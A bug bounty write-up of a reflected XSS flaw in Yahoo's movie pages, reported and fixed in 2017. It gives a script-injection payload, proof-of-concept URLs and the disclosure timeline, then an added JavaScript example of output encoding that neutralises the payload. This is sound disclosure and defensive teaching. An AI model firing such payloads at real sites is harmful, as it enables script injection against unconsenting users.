Reflected XSS in Yahoo!
Shahzada Al Shahriar Khan, Thursday, August 31, 2017
Tags: Bug Bounty, Cross-Site Scripting, Ethical Hacking, Hackerone, Reflected XSS in Yahoo, XSS In Yahoo
Hello guys, this is Shahzada Al Shahriar Khan, known as TheShahzada.
I am from Bangladesh, and I am a newbie in bug bounty. :P
Well, now I will share how I found reflected Cross-Site Scripting (XSS) in the main domain and a subdomain of Yahoo.
Vulnerable URL:
1. https://www.yahoo.com/movies/film/[*]
2. https://ca.yahoo.com/movies/film/[*]
Payload I Used:
"><%2fscript><script>alert(document.domain)<%2fscript>
PoC URL:
1. https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
2. https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
PoC: [screenshot: Yahoo Canada subdomain]
Video PoC: [embedded video]
Timeline:
Aug 12th — I Submitted The Report.
Aug 15th — Triaged The Report & Rewarded Me $300 Initial Bounty.
Aug 16th — Resolved.
Aug 24th — $400 Bounty Rewarded.
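The payload above starts with "> and a closing script tag, so it only does anything where the path segment is echoed unencoded into a quoted attribute or an inline script block. The following is an added example, not code from this post or from Yahoo: it shows context-specific output encoding for both of those sinks, run against the PoC path. The function names, the page template and the assumption that the router percent-decodes the segment are all hypothetical.

```javascript
// Added example: context-aware output encoding for a reflected URL path segment.
// renderFilmPage and its template are hypothetical, not Yahoo's code.

// Encode for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encode for an inline <script> block: JSON-quote the value, then escape the
// characters that could close the script element or confuse the HTML parser.
function escapeForInlineScript(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Take the segment after /movies/film/ and percent-decode it, as a framework
// router is assumed to do before handing the value to a template.
function filmSlug(path) {
  const prefix = '/movies/film/';
  if (!path.startsWith(prefix)) return null;
  try {
    return decodeURIComponent(path.slice(prefix.length));
  } catch (e) {
    return null; // malformed percent-encoding: reject rather than reflect
  }
}

// Render the slug into both sinks, each with the encoder for its context.
function renderFilmPage(path) {
  const slug = filmSlug(path);
  if (slug === null) return '<h1>Not found</h1>';
  return [
    `<meta property="og:title" content="${escapeHtml(slug)}">`,
    `<script>var pageData = { slug: ${escapeForInlineScript(slug)} };</script>`,
  ].join('\n');
}

// Constructed input: the path portion of the PoC URL in this post.
const pocPath = '/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>';
console.log(renderFilmPage(pocPath));
```

With both encoders in place the rendered page contains exactly one script element, and the reflected value stays inside the attribute and the string literal.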
Originally published at blog.theshahzada.com on August 31, 2017.